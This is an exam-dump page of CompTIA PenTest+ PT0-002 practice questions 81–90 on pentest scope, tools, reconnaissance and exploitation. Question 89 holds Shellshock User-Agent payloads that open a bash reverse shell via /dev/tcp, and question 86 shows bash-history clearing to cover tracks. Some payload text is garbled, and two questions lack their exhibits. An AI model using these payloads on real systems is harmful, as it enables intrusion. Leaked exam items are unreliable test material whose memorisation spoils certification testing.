Enjoy 15% Discount With Coupon 15off

CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training

CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training

CompTIA PT0-002 Online Training

The questions for PT0-002 were last updated at Nov 26,2024.
  • Exam Code: PT0-002
  • Exam Name: CompTIA PenTest+ Certification Exam
  • Certification Provider: CompTIA
  • Latest update: Nov 26,2024
Question #81

autonumA penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

  • A . Utilize the tunnel as a means of pivoting to other internal devices.
  • B . Disregard the IP range, as it is out of scope.
  • C . Stop the assessment and inform the emergency contact.
  • D . Scan the IP range for additional systems to exploit.

Reveal Solution Hide Solution

Question #82

autonumWhich of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

  • A . Wireshark
  • B . EAPHammer
  • C . Kismet
  • D . Aircrack-ng

Reveal Solution Hide Solution

Question #83

autonumA security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

  • A . Exploiting a configuration weakness in the SQL database
  • B . Intercepting outbound TLS traffic
  • C . Gaining access to hosts by injecting malware into the enterprise-wide update server
  • D . Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
  • E . Establishing and maintaining persistence on the domain controller

Reveal Solution Hide Solution

Question #84

autonumWhich of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

  • A . Shodan
  • B . Nmap
  • C . WebScarab-NG
  • D . Nessus

Reveal Solution Hide Solution

Question #85

autonumA penetration tester wants to test a list of common passwords against the SSH daemon on a network device.

Which of the following tools would be BEST to use for this purpose?

  • A . Hashcat
  • B . Mimikatz
  • C . Patator
  • D . John the Ripper

Reveal Solution Hide Solution

Question #86

autonumA penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch Cr .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

  • A . Redirecting Bash history to /dev/null
  • B . Making a copy of the user’s Bash history for further enumeration
  • C . Covering tracks by clearing the Bash history
  • D . Making decoy files on the system to confuse incident responders

Reveal Solution Hide Solution

Question #87

autonumA penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A . Familiarity and likeness
  • B . Authority and urgency
  • C . Scarcity and fear
  • D . Social proof and greed

Reveal Solution Hide Solution

Question #88

autonumA penetration tester is testing a new API for the company’s existing services and is preparing the following script:

Which of the following would the test discover?

  • A . Default web configurations
  • B . Open web ports on a host
  • C . Supported HTTP methods
  • D . Listening web servers in a domain

Reveal Solution Hide Solution

Question #89

autonumA penetration tester discovers a vulnerable web server at 10.10.1.1.

The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,

“Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
    “text/html,application/xhtml+xml,application/xml”}
  • B . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”:
    “text/html,application/xhtml+xml,application/xml”}
  • C . exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”:
    “text/html,application/xhtml+xml,application/xml”}
  • D . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”,
    “Accept”: “text/html,application/xhtml+xml,application/xml”}

Reveal Solution Hide Solution

Question #90

autonumDuring the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

  • A . Linux
  • B . NetBSD
  • C . Windows
  • D . macOS

Reveal Solution Hide Solution

Previous Questions Next Questions
Latest PT0-002 Dumps Valid Version with 110 Q&As

Latest And Valid Q&A | Instant Download | Once Fail, Full Refund

Instant Download PT0-002 PDF
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related Posts

13Aug

CompTIA 220-1101 CompTIA A+ Certification Exam: Core 1 Online Training

Question #1 A user sends a print job lo a network printer, and the print job uses double the amount of... read more

26Oct

CompTIA XK0-004 CompTIA Linux+ Certification Exam Online Training

Question #1 Which of the following is the purpose of the vmlinux file on a Linux system? A . To prevent a... read more

20Oct

CompTIA 220-1001 CompTIA A+ Certification Exam: Core 1 Online Training

Question #1 Which of the following is the MOST likely cause for a network PC to have an APIPA address? A .... read more

06Sep

CompTIA DA0-001 CompTIA Data+ Certification Online Training

Question #1 Refer to the exhibit. A data analyst needs to calculate the mean for Q1 sales using the data set... read more

04Sep

CompTIA N10-008 CompTIA Network+Exam Online Training

Question #1 A systems administrator needs to improve WiFi performance in a densely populated office tower and use the latest standard.... read more

21Aug

CompTIA SY0-701 CompTIA Security+ Online Training

Question #1 Which of the following threat actors is the most likely to be hired by a foreign government to attack... read more

14Aug

CompTIA PK0-005 CompTIA Project+Certification Online Training

Question #1 A PM has identified all the resources involved in a project. The next step is to identify which resources... read more

07Sep

CompTIA 220-1102 CompTIA A+ Certification Core 2 Exam Online Training

Question #1 A user contacts a technician about an issue with a laptop. The user states applications open without being launched... read more

16Oct

CompTIA N10-007 CompTIA Network+ N10-007 Online Training

Question #1 A company wants to implement a wireless infrastructure on its campus to meet the needs of its BYOD initiative.... read more

13Sep

CompTIA FC0-U61 CompTIA IT Fundamentals+ Certification Exam Online Training

Question #1 Which of the following is primarily a confidentiality concern? A . EavesdroppingB . ImpersonatingC . DestructingD . Altering read more